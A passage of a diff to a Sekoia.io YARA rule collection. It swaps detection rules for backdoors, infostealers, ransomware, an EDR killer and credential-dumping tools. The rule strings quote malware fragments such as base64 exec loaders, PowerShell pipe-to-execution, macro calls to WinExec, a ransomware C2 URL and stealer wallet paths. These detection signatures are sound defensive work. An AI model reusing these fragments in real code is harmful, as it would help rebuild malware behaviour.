-		$ = "Payload to execute:" wide
-		$ = "No payload arguments were provided" wide
-		$ = "Payload arguments:" wide
-		$ = "MEX - About to execute payload %s with command line arguments: %s" wide
-		$ = "MEX - About to execute payload %s with no command line arguments" wide
-		$ = "Execution of payload %s just finished. Quitting now." wide
-		$ = "There was a problem executing payload %s. Quitting now." wide
-		$ = "chisel" wide
-		$ = "enum_script" wide
-		$ = "eop_script" wide
-		$ = "mexecatz" wide
-		$ = "scshell" wide
-		$ = "shares_script" wide
-		$ = "internalmonologue" wide
-		$ = "inveigh" wide
-		$ = "pingcastle" wide
-		$ = "rubeus" wide
-		$ = "seatbelt" wide
-		$ = "sharpexec" wide
-		$ = "sharphound3" wide
-		$ = "spoolsample" wide
-		$ = "standin" wide
-		$ = "grouper2" wide
-		$ = "lockless" wide
-		$ = "sharpoxidresolver" wide
-		$ = "sharpprinter" wide
-		$ = "list_plugins" wide
-		$ = "get_version" wide
-		$ = "Current version is %s" wide
-		$ = "Supported plugins:" wide
+		$s1 = "$splitter" ascii wide
+		$s2 = "[System.Convert]::FromBase64String" ascii wide
+		$s3 = "$_;$var2 =\"var1\";$var3" ascii wide
+		$s4 = "foreach-object{$_|powershell -noprofile -}" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 10MB and 15 of them
+		$s1 and $s2 and ( $s3 or $s4 ) and filesize < 100KB
 }
-rule SEKOIA_Apt_Aridviper_Rustsysjoker : FILE
+rule SEKOIA_Apt_Buhtrap_Maldocx
 {
 	meta:
-		description = "Detects Rust Sysjoker variant via PDB path or key and Rust string"
+		description = "Detect the malicious DOCX used by Buhtrap"
 		author = "Sekoia.io"
-		id = "14ff3f76-0371-4b45-9864-bf69c74e60aa"
-		date = "2023-11-27"
+		id = "4aaba2f1-fafd-4e3f-8b18-7beda11464d1"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_aridviper_rustsysjoker.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cb3c5d37095c27aa169a6aa61fa12972ff71877c615eaa254c3906ef10c662a9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_buhtrap_maldocx.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "69968fa6836a71cd835f40c5168d197d3b5fc13b62791279f48a6bdeb4709bd5"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$Rust = "called `Option::unwrap()` on a `None` value"
-		$Key = "QQL8VJUJMABL8H5YNRC9QNEOHA"
-		$PDB = "C:\\Code\\Rust\\RustDown-Belal\\target\\release\\deps\\RustDown.pdb"
+		$ = "<xm:macrosheet xmlns=" ascii fullword
+		$ = "CALL(\"kernel32\",\"VirtualFree"
+		$ = "CALL(\"kernel32\",\"CreateFileA"
+		$ = "CALL(\"kernel32\",\"WriteFile"
+		$ = "CALL(\"kernel32\",\"VirtualAlloc"
+		$ = "CALL(\"kernel32\",\"WinExec"
+		$ = "CALL(\"kernel32\",\"lstrcatA"
+		$ = "CALL(\"kernel32\",\"CreateFileA"
+		$ = "CALL(\"kernel32\",\"VirtualFree"
+		$ = "CALL(\"kernel32\",\"ExpandEnvironmentStringsA"
+		$ = "CALL(\"kernel32\",\"CloseHandle"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and ( $PDB or ( $Rust and $Key ) )
+		all of them
 }
-rule SEKOIA_Apt_Uta0218_Upstyle_Backdoor_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_1 : FILE
 {
 	meta:
-		description = "Detects UPSTYLE backdoor"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "098fbad7-efaf-4198-83de-208c2ae16f89"
-		date = "2024-04-16"
+		id = "0b328771-f674-4606-bb30-d20d07c67832"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_uta0218_upstyle_backdoor_strings.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bcba657b0b302f4b46f09bc4b815a581d22208b5d9f99e1233878f775241f92e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_commonmagic_generic_1.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "513226d050945af1a8bbc51f9a48936c815bfc6cd43b0766e34ac000d3c90625"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245311,30 +245896,26 @@ rule SEKOIA_Apt_Uta0218_Upstyle_Backdoor_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1_1 = "f.write(b'''import base64;exec(base64.b64decode(b" ascii
-		$s1_2 = "atime=os.path.getatime(" ascii
-		$s2_1 = "exec(base64.b64decode(functioncode))" ascii base64
-		$s2_2 = "os.path.exists(systempth):" ascii base64
-		$s2_3 = ".read().replace(b\"\\x00\",b\" \")" ascii base64
-		$s3_1 = "if WRITE_FLAG:" ascii base64
-		$s3_2 = "re.search(SHELL_PATTERN" ascii base64
-		$s3_3 = "import threading,time,os,re,base64" ascii base64
+		$ = "\\CommonCommand\\Clean\\"
+		$ = "\\CommonCommand\\Overall\\"
+		$ = "\\CommonCommand\\Other\\"
+		$ = "\\CommonCommand\\Other\\*"
 
 	condition:
-		filesize < 1500 and ( 2 of ( $s1_* ) or 2 of ( $s2_* ) or 2 of ( $s3_* ) )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Tinynote : FILE
+rule SEKOIA_Apt_Agent_Racoon_Strings : FILE
 {
 	meta:
-		description = "Detects strings in TinyNote backdoor"
+		description = "Detects Agent Racoon used by CL-STA-0002"
 		author = "Sekoia.io"
-		id = "a2b9bea4-a211-456f-8a3f-0f31733e8b29"
-		date = "2023-06-07"
+		id = "ec89f1db-0ba8-48c8-8c1a-c38c410f3e39"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_tinynote.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "20723b449d057ddf09fa34aa7511275939f98c6c84593af64d99f980c679b2c1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_agent_racoon_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4e32606edffab0907e343ab2fef8642c0064d83c2933531619f9dee8957d2fe4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245342,27 +245923,30 @@ rule SEKOIA_Apt_Mustangpanda_Tinynote : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "bypassSMADAV" ascii fullword
-		$s2 = "excuteCmdLine" ascii fullword
-		$s3 = "/Create1953125" ascii
-		$s4 = "MINUTEMonday" ascii
-		$s5 = "WndProc" ascii
+		$ = "Command failed:" wide
+		$ = "Not uploaded:" wide
+		$ = "Not downloaded:" wide
+		$ = "xn--cc" wide
+		$ = "xn--ac" wide
+		$ = "xn--bc" wide
+		$ = "cmd.exe" wide
+		$ = ".xn--" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Badmagic_Reco_Pshscript : FILE
+rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022_2 : FILE
 {
 	meta:
-		description = "Detects BadMagic Reco powershell script"
+		description = "Detects Saitama backdoor variants"
 		author = "Sekoia.io"
-		id = "7a1b2d31-03b7-4a43-8f4e-ed38ba8e118e"
-		date = "2023-05-15"
+		id = "f885551a-d0f0-431d-aa4f-7caa93b1db6a"
+		date = "2022-05-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_reco_pshscript.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "86369267545241f33c6fc7dab11eb06f71641d8e9cd0365ddcc676d4f4c9739b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_saitama_backdoor_may2022_2.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "622c386d4b10b81a5c84f9c093d91add04497a707ba88e8395fda8587b5c3791"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245370,61 +245954,54 @@ rule SEKOIA_Apt_Badmagic_Reco_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$headers = @{};"
-		$ = "==ARP Cache=="
-		$ = "ipconfig.me"
-		$ = "-ComputerName $env:computername;"
+		$ = "_CorExeMain"
+		$ = "GetAgentID"
+		$ = "ComputeStringHash"
+		$ = ".Agent.pdb"
+		$ = "TaskExecTimeout"
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Ransomware_Win_Honkai_Jan2023 : FILE
+rule SEKOIA_Apt_Blackwood_Nspx30_Plugin : FILE
 {
 	meta:
-		description = "Rule to detect Honkai ransomware samples."
+		description = "Detects plugins of NSPX30 backdoor based on RTTI and rundll32 string"
 		author = "Sekoia.io"
-		id = "6ef91cb5-e122-4f91-bc15-3813b8f91cbf"
-		date = "2023-02-13"
+		id = "ef8e0d51-c78c-426b-8008-910e27546f23"
+		date = "2024-01-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_honkai_jan2023.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "19f831f77e043f11b790b7f24e9f585e4986d9af6580bae7c344b7960f2f0965"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_blackwood_nspx30_plugin.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cf7c232a5a817ff5c0da04744abf99ed2fcea587e3e6f6e8bf3aef7ca8f2b51b"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "989cf96da60d9ebfb6f364717b4f0cae1667fdc7f9d89f77acc254ab47d439e6"
 
 	strings:
-		$s1 = "DP_Main.exe" ascii wide
-		$s2 = "DP_MainForm" ascii wide
-		$s3 = "DP_Main" ascii wide
-		$s4 = "#DECRYPT MY FILES#.html" ascii wide
-		$s5 = "/api/Encrypted.php" ascii wide
-		$s6 = "http://upload.paradisenewgenshinimpact.top:2095" ascii wide
-		$s7 = "main@paradisenewgenshinimpact.top" ascii wide
-		$s8 = ".honkai" ascii wide
+		$s1 = {2E 3F 41 56 43 43 61 62 69 6E 65 74 40 40}
+		$s2 = {2E 3F 41 56 43 45 6E 63 6F 64 65 72 40 40}
+		$s3 = "rundll32.exe \"%hs\",#1" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Rat_Win_Xworm_V3 : FILE
+
+rule SEKOIA_Infostealer_Win_Aurora_Str : FILE
 {
 	meta:
-		description = "Finds XWorm (version XClient, v3) samples based on characteristic strings"
+		description = "Finds Aurora botnet samples based on characteristic strings."
 		author = "Sekoia.io"
-		id = "5fb1cbd3-1e37-43b9-9606-86d896f2150b"
-		date = "2023-03-03"
+		id = "1f4391b8-700f-4702-9ef6-68ce3d55a176"
+		date = "2022-07-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_xworm_v3.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "0016647c3c7031e744c0af6f9eadb73ab5cab1ca4f8ce7633f4aa069b62755cd"
-		hash = "07e747a9313732d2dcf7609b6a09ac58d38f5643299440b827ec55f260e33c12"
-		hash = "de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147"
-		logic_hash = "9a50f41f6c295f48597f6db3f5d9141345b3711ef110a0f925c881f3a75580ca"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_aurora_str.yar#L3-L34"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "745443bb58f00cb09a1f323f530219913eaaf0d0e71c9a25af2072006f8c5f92"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245432,35 +246009,40 @@ rule SEKOIA_Rat_Win_Xworm_V3 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "$VB$Local_Port" ascii
-		$str02 = "$VB$Local_Host" ascii
-		$str03 = "get_Jpeg" ascii
-		$str04 = "get_ServicePack" ascii
-		$str05 = "Select * from AntivirusProduct" wide
-		$str06 = "PCRestart" wide
-		$str07 = "shutdown.exe /f /r /t 0" wide
-		$str08 = "StopReport" wide
-		$str09 = "StopDDos" wide
-		$str10 = "sendPlugin" wide
-		$str11 = "OfflineKeylogger Not Enabled" wide
-		$str12 = "-ExecutionPolicy Bypass -File \"" wide
-		$str13 = "Content-length: 5235" wide
+		$str01 = "Logs.tar" ascii
+		$str02 = "*main.StealerData" ascii
+		$str03 = "AppData\\Roaming\\Armory" ascii
+		$str04 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" ascii
+		$str05 = "github.com/TheTitanrain/w32" ascii
+		$str06 = "github.com/mattn/go-sqlite3" ascii
+		$str07 = "ScreenShot" ascii
+		$str08 = "*sql.stmtConnGrabber" ascii
+		$str09 = "Default\\Network\\Cookies" ascii
+		$str10 = "BuildID" ascii
+		$str11 = "Clipper" ascii
+		$str12 = "GeoPos" ascii
+		$str13 = "AppData\\Roaming\\Exodus\\exodus.wallet" ascii
+		$str14 = "FileGrabber\\Documents" ascii
+		$str15 = "193.233.48." ascii
+		$str16 = "ShellExecute" ascii
+		$str17 = "crypto/aes.(*aesCipherGCM).Encrypt" ascii
+		$str18 = "File-Download" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint16( 0 ) == 0x5A4D and ( 14 of them or pe.imphash ( ) == "8ee5c1c09f740fbe63e8b35dac5d6f70" or pe.imphash ( ) == "369b4f5b6c99674f15070689e1f675af" )
 }
-rule SEKOIA_Apt_Sandworm_Olympicdestroyer : FILE
+rule SEKOIA_Apt_Ta410_Flowcloud_Loader : FILE
 {
 	meta:
-		description = "Detects OlympicDestroyer malware"
+		description = "Detects FlowCloud Loader"
 		author = "Sekoia.io"
-		id = "6820eb32-fea2-4a00-a5a2-672ba09f8206"
-		date = "2022-04-15"
+		id = "0a11dfa0-5a59-477b-baf6-6a777d020860"
+		date = "2024-05-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sandworm_olympicdestroyer.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a68a96ab036e69a32e173b2d2fa6a81ab872032f89bfdfc3cd4446305a33921b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_ta410_flowcloud_loader.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "450cfdfbd9a42b623fc1acb55f3ea309ae54282b480edcb9495f4d45874d3922"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245468,28 +246050,30 @@ rule SEKOIA_Apt_Sandworm_Olympicdestroyer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "cmd.exe /c (ping 0.0.0.0 > nul)" wide
-		$ = "if exist %programdata%\\evtchk.txt" wide
-		$ = "\\\\.\\pipe\\%ls" wide
-		$ = "%ProgramData%\\%COMPUTERNAME%.exe" wide
-		$ = "(exit 5) else ( type nul >" wide
-		$ = "Select * From Win32_ProcessStopTrace" nocase
+		$decryption_function = {8A C8 80 C1 26 32 D1 30 14 38}
+		$derivation_key = {6B 04 00 00 F7 ?? 81 c2 a8 01 00 00}
+		$new_pattern_1 = {50 33 c0 58 74 01 e8}
+		$new_pattern_2 = {89 44 24 fc 58 8D 64
+        24 fc 81 fc 00 10 00
+        00 77 06 81 c4 ?? ??
+        ?? ?? 8B 44 24 FC}
+		$patch_bytes = {68 78 56 34 12 C3 90 90 90 90 90 00}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 2 of them
 }
-rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader : FILE
+rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor_Obfuscated : FILE
 {
 	meta:
-		description = "Detects the core of the VBS Gamaredon's Telegram Downloader"
+		description = "Detects obfuscated Muddys manifestation JScript backdoor"
 		author = "Sekoia.io"
-		id = "c934b95d-d81d-4f58-a752-1bb31ba8593d"
-		date = "2023-01-25"
+		id = "58df72a1-822c-4b82-904d-1c0124dc7bc1"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "940635313b23e29ac98310fc0f20352405c96190d56cd36ef028bf4d6e77fa6b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_manifestation_backdoor_obfuscated.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8610f0895fafd2bc9a19bbff816754b563565ba6b105cc3d0a32b80bf5ebdc47"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245497,118 +246081,81 @@ rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "==([0-9\\@]+)==" ascii
-		$a2 = "data\"\":\"\"(.*?)" ascii
-		$a3 = ", vbcr ,\"\")" ascii
-		$a4 = ", vblf ,\"\")" ascii
-		$a5 = ", \"&&\" ,\"\")" ascii
-		$a6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" ascii
-		$b1 = "==([0-9\\@]+)==" base64
-		$b2 = "data\"\":\"\"(.*?)" base64
-		$b3 = ", vbcr ,\"\")" base64
-		$b4 = ", vblf ,\"\")" base64
-		$b5 = ", \"&&\" ,\"\")" base64
-		$b6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" base64
+		$m = { 76 61 72 20 5f 30 78 [4-6] 3d 5b }
+		$w = {57 53 63 72 69 70 74 5b 5f 30 78 [4-6] 28 30 78 [2-3] 29 5d 28 30 78 [2-3] 2a 30 78 [2-3] 29 2c }
+		$t = "subkeys(key));}"
 
 	condition:
-		(4 of ( $a* ) or 4 of ( $b* ) ) and filesize < 50KB
+		$m at 0 and ( $t at ( filesize -16 ) or $w in ( filesize -200 .. filesize ) )
 }
-rule SEKOIA_Truesightkiller_Avkiller_Strings : FILE
+rule SEKOIA_Apt_Aptc36_Vbs_Maldoc : FILE
 {
 	meta:
-		description = "TrueSightKiller based on string"
+		description = "Find VBS file used by the threat actor APT-C-36"
 		author = "Sekoia.io"
-		id = "8f249ac4-5181-4169-9eb2-7d73ec4fd68d"
-		date = "2024-10-29"
+		id = "f0ca061f-e94b-4f70-bbd1-8a15193652d3"
+		date = "2022-02-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/truesightkiller_avkiller_strings.yar#L1-L45"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "891202963430a4b1dea2dc5b9af01dc5"
-		hash = "367af202029bf51fc347a8f414fa2a5c"
-		hash = "64439836d69084b129c2dc4264176149"
-		hash = "6e69b890b1c228fa4225776b185b5af7"
-		hash = "daaf7bdf1e7fd882c0bfb89450ec0ab2"
-		hash = "dcf36765ed9386c169eb2695d26f6a6f"
-		logic_hash = "829d144023569f332a27b7f2344d2da7be59ae5044a13c299c5da50d896288ed"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_aptc36_vbs_maldoc.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cf448731378e97d740d42aa19d1bb81330c3998f07e94ce57bd8d82fc39c6428"
 		score = 75
-		quality = 78
+		quality = 51
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] Process PID: " wide
-		$ = "[-] OpenSCManager failed" wide
-		$ = "[+] Creating service: truesight" wide
-		$ = "[+] Full path: " wide
-		$ = "[-] Error getting current directory." wide
-		$ = "[-] CreateService failed" wide
-		$ = "[!] Service is already running" wide
-		$ = "[-] QueryServiceStatus failed" wide
-		$ = "[-] StartService failed" wide
-		$ = "[+] Driver loaded successfully!" wide
-		$ = "[-] OpenService failed" wide
-		$ = "[-] ControlService failed" wide
-		$ = "[-] DeleteService failed" wide
-		$ = "Welcome to EDR/AV Killer using truesight driver!" wide
-		$ = "This is a PoC, use it at your own risk!" wide
-		$ = "[-] Failed to set CTRL+C handler. Exiting..." wide
-		$ = "ntdll.dll" wide
-		$ = "\\\\.\\TrueSight" wide
-		$ = "[-] CreateFileA failed" wide
-		$ = " not running" wide
-		$ = "[-] Process name: " wide
-		$ = "[+] Terminating PID: " wide
-		$ = "[-] DevicesIoControl failed" wide
-		$ = "[!] Stoping and Deleting trueSight Service!" wide
+		$dim = "dim " wide ascii
+		$hea = "::::::::::::::::::::::::::::::::::::::::::::::::" wide ascii
+		$str0 = "update" wide ascii nocase
+		$str1 = "On Error Resume Next" wide ascii
+		$str2 = "CreateObject" wide ascii
+		$str3 = "WScript" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 20 of them
+		#dim> 5 and #hea > 10 and 2 of ( $str* ) and filesize > 10KB and filesize < 1MB
 }
-rule SEKOIA_Apt_Ta410_Driver_Keylogger : FILE
+rule SEKOIA_Apt_Kimsuky_Sharptongue_C2_Source
 {
 	meta:
-		description = "Keylogger TA410"
+		description = "Detects the PHP code of the SharpTongue C2"
 		author = "Sekoia.io"
-		id = "0cba1b3b-b93e-41e3-a7df-afd306e6b519"
-		date = "2022-10-11"
+		id = "a2ccf773-511c-4088-8bcf-b923291d024b"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_ta410_driver_keylogger.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5ed152cc068f194cb7bf8c34744f0f1ebd4f621e6ae47f14bab64b18d94af4c5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharptongue_c2_source.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c301a99876cfe2863546c990654aa922f9327e0eb010968eaea43f1d8ced76da"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "namedpipe_keymousespy" ascii wide
-		$ = "[`LCTRL]" ascii wide
-		$ = "[`RCTRL]" ascii wide
-		$ = "[`BREAK]" ascii wide
-		$ = "[`NUMLOCK]" ascii wide
-		$ = "[`L]" ascii wide
-		$ = "[`R]" ascii wide
-		$ = "[`M]" ascii wide
+		$ = "<?php"
+		$ = "foreach($_GET as $variable => $value)"
+		$ = "$chk=$value"
+		$ = "base64_encode($ip)"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		all of them
 }
-rule SEKOIA_Infostealer_Win_Ducklogs : FILE
+rule SEKOIA_Tool_Safetykatz : FILE
 {
 	meta:
-		description = "Detects DuckLogs based on specific strings"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
-		date = "2022-12-01"
+		id = "90f93244-38a7-4574-87c6-15d494e9173b"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_ducklogs.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5db1a5595ec41488da620606bbcb36d0d686f9d6b7a0479439c53625df0886a0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_safetykatz.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f443dd5be1e15f8385427d965f8c8476c5f1b57b7c9ab53d9e13eb47735e09d3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245616,93 +246163,77 @@ rule SEKOIA_Infostealer_Win_Ducklogs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dck = "DuckLogs" ascii wide
-		$str01 = "CheckRemoteDebuggerPresent" ascii
-		$str02 = "MozGlueNotFound" ascii
-		$str03 = "get_DecryptedPassword" ascii
-		$str04 = "get_Extension" ascii
-		$str05 = "set_UseShellExecute" ascii
-		$str06 = "FirefoxPasswords" ascii
-		$str07 = "GetAllGeckoCookies" ascii
-		$str08 = "GetAllBlinkDownloadsBy" ascii
-		$str09 = "Grabbers" ascii
-		$str10 = "Utility" ascii
-		$str11 = "Persistance" ascii
-		$str12 = "Clipboard" ascii
-		$str13 = "WaterfoxGrabber" ascii
-		$str14 = "AvastGrabber" ascii
+		$s1 = "SafetyKatz" ascii fullword
+		$s2 = "get_mimikatz" ascii fullword
+		$s3 = "$8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( #dck > 4 and 2 of ( $str* ) ) or 12 of them )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Realblindingedr_Strings : FILE
+rule SEKOIA_Suspicious_Users_Dev : FILE
 {
 	meta:
-		description = "Detects RealBlindingEDR based on strings"
+		description = "Nirscord stealer"
 		author = "Sekoia.io"
